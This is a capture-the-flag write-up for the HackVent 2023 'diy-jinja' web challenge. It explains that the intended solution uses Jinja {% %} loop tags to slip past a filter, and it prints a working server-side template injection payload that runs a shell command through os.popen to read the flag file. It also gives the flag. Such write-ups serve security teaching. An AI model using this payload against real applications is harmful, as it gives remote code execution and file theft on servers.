HackVent 2023 - [HV23.10] diy-jinja

Difficulty: Medium

Category: Web Security

Author: coderion

We’ve heard you like to create your own forms. With SANTA (Secure and New Template Automation), you can upload your own jinja templates and have the convenience of HTML input fields to have your friends fill them out! Obviously 100% secure and even with anti-tampering protection!

This challange actually had two unintended solutions (Regex bypass and abusing the description field for labels), the intended solution was to just use {% %} tags for flow control instead of {{}}:

{% for char in request.application.__globals__.__builtins__.__import__('os').popen('cat /app/flag.txt').read() %}
 {{ char }}
{% endfor %}

The flag is: HV23{us3r_suppl13d_j1nj4_1s_4lw4ys_4_g00d_1d34}